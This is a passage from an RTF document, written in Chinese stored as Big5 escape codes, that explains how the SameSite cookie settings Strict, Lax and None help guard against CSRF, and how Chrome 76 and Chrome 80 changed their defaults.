\cf1 Strict \'aa\'ed\'a5\'dc request \'aa\'ba\'ba\'f4\'b0\'ec\'a5\'b2\'b6\'b7\'b8\'f2\'ba\'f4\'a7\'7d\'a6\'43\'a4\'a4\'aa\'ba\'ba\'f4\'b0\'ec\'ac\'db\'a6\'50\'a1\'41\'a4\'7e\'b7\'7c\'b5\'6f\'b0\'65\'b3\'6f\'ad\'d3 cookie\'a1\'43\'a5\'48\'a4\'57\'ad\'b1\'aa\'ba\'a8\'d2\'a4\'6c\'a6\'d3\'a8\'a5\'a1\'41\'b5\'6f\'b0\'65\'c2\'e0\'b1\'62\'aa\'ba POST \'bd\'d0\'a8\'44\'ae\'c9\'a1\'41\'a6\'5d\'ac\'b0\'c4\'dd\'a9\'f3\'b8\'f3\'b0\'ec\'bd\'d0\'a8\'44\'aa\'ba\'c3\'f6\'ab\'59\'a1\'41\'a8\'c3\'a4\'a3\'b7\'7c\'c4\'e2\'b1\'61\'aa\'ed\'a5\'dc\'a8\'ad\'a5\'f7\'aa\'ba cookie\'a1\'41\'b4\'4e\'a4\'a3\'b7\'7c\'a8\'fc\'a8\'ec CSRF \'a7\'f0\'c0\'bb\'a1\'43\par
\'a4\'f1\'b8\'fb\'af\'53\'a7\'4f\'aa\'ba\'a4\'40\'c2\'49\'ac\'4f\'a1\'41\'a6\'70\'aa\'47\'ac\'4f\'b1\'71 email \'be\'c9\'b9\'4c\'a5\'68 bank.com\'a1\'41SameSite cookie \'a4\'5d\'a4\'a3\'b7\'7c\'b3\'51\'b5\'6f\'b0\'65\'b5\'b9 server\'a1\'43\'b3\'6f\'a5\'69\'a5\'48\'ab\'4f\'c5\'40\'a8\'cf\'a5\'ce\'aa\'cc\'a4\'a3\'b7\'7c\'a6\'5d\'ac\'b0\'c2\'49\'a4\'46\'b3\'a8\'b3\'bd\'ab\'48\'a5\'f3\'aa\'ba\'b3\'73\'b5\'b2\'b4\'4e\'c2\'e0\'b1\'62\'b5\'b9\'c3\'61\'a4\'48\'a1\'43\'af\'ca\'c2\'49\'ac\'4f\'a1\'41\'a7\'59\'a8\'cf\'ab\'48\'a5\'f3\'bd\'54\'b9\'ea\'ac\'4f\'a8\'d3\'a6\'db bank.com\'a1\'41\'a4\'5d\'a4\'40\'ab\'df\'bb\'dd\'ad\'6e\'a8\'cf\'a5\'ce\'aa\'cc\'ad\'ab\'b7\'73\'b5\'6e\'a4\'4a\'a1\'41\'ac\'db\'b9\'ef\'a6\'d3\'a8\'a5\'b8\'fb\'ac\'b0\'a4\'a3\'a4\'e8\'ab\'4b\'a1\'43\'a9\'d2\'a5\'48\'b3\'6f\'ad\'d3\'b3\'5d\'b8\'6d\'a4\'f1\'b8\'fb\'be\'41\'a6\'58\'a5\'ce\'a9\'f3\'b1\'d3\'b7\'50\'be\'de\'a7\'40\'a4\'57\'a1\'41\'a8\'d2\'a6\'70\'c2\'e0\'b1\'62\'a1\'42\'ad\'d7\'a7\'ef\'b1\'4b\'bd\'58\'b5\'a5\'a1\'43\par
\par
\cf0 SameSite=lax\par
Lax cookie \'a9\'4d strict \'ac\'db\'a4\'f1\'a4\'a7\'a4\'55\'ad\'ad\'a8\'ee\'a4\'f1\'b8\'fb\'bc\'65\'c3\'50\'a4\'40\'a8\'c7\'a1\'43\'c2\'73\'c4\'fd\'be\'b9\'b5\'6f\'b0\'65\'b8\'f3\'ba\'f4\'b0\'ec\'aa\'ba request \'a4\'40\'bc\'cb\'a4\'a3\'b7\'7c\'c4\'e2\'b1\'61 lax cookie\'a1\'41\'b0\'a3\'a4\'46\'be\'c9\'a6\'56\'a5\'d8\'bc\'d0\'ba\'f4\'a7\'7d\'aa\'ba GET request\'a1\'43\par
\'a9\'d2\'a5\'48\'b3\'e6\'af\'c2\'a6\'61\'a6\'62\'c2\'73\'c4\'fd\'be\'b9\'b6\'7d\'b1\'d2\'b3\'73\'b5\'b2\'a1\'41\'a9\'ce\'ac\'4f\'b1\'71 email \'c2\'49\'b6\'7d\'b3\'73\'b5\'b2\'b7\'7c\'c4\'e2\'b1\'61 lax cookie\'a1\'43\par
\'aa\'60\'b7\'4e\'a1\'47\'b1\'71Chrome 76 \'b6\'7d\'a9\'6c\'a1\'41\'b9\'77\'b3\'5d\'ad\'c8\'ac\'b0 SameSite=lax\'a1\'43\'b3\'6f\'b7\'4e\'a8\'fd\'b5\'db\'b2\'c4\'a4\'54\'a4\'e8 cookie \'a6\'62\'a8\'53\'a6\'b3\'a9\'fa\'bd\'54\'a6\'61\'b3\'5d\'a9\'77 SameSite \'aa\'ba\'b1\'a1\'aa\'70\'a4\'55\'b7\'7c\'a5\'a2\'ae\'c4\'a1\'43\par
\cf1\par
\cf0 SameSite=none\par
\'b8\'f3\'b0\'ec\'aa\'ba\'b1\'a1\'aa\'70\'a4\'55\'c1\'d9\'ac\'4f\'b7\'7c\'b0\'65\'a5\'58 cookie\'a1\'43\'aa\'60\'b7\'4e\'a1\'47\'b1\'71Chrome 80 \'b6\'7d\'a9\'6c\'a1\'41\'a8\'cf\'a5\'ce\'b3\'6f\'ad\'d3\'bf\'ef\'b6\'b5\'a5\'b2\'b6\'b7\'a6\'50\'ae\'c9\'b6\'7d\'b1\'d2 Secure \'b0\'d1\'bc\'c6\'a1\'43\'a6\'70\'aa\'47\'a7\'41\'aa\'ba\'b2\'a3\'ab\'7e\'a5\'f5\'bf\'e0\'b2\'c4\'a4\'54\'a4\'e8 cookie\'a1\'41\'a8\'d2\'a6\'70\'bc\'73\'a7\'69\'a1\'42iframe \'b4\'4f\'a4\'4a\'ae\'4d\'a5\'f3\'b5\'a5\'a1\'41\'c0\'b3\'b8\'d3\'ad\'6e\'a8\'cf\'a5\'ce\'b3\'6f\'ad\'d3\'bf\'ef\'b6\'b5\'a1\'43\b\par
}
 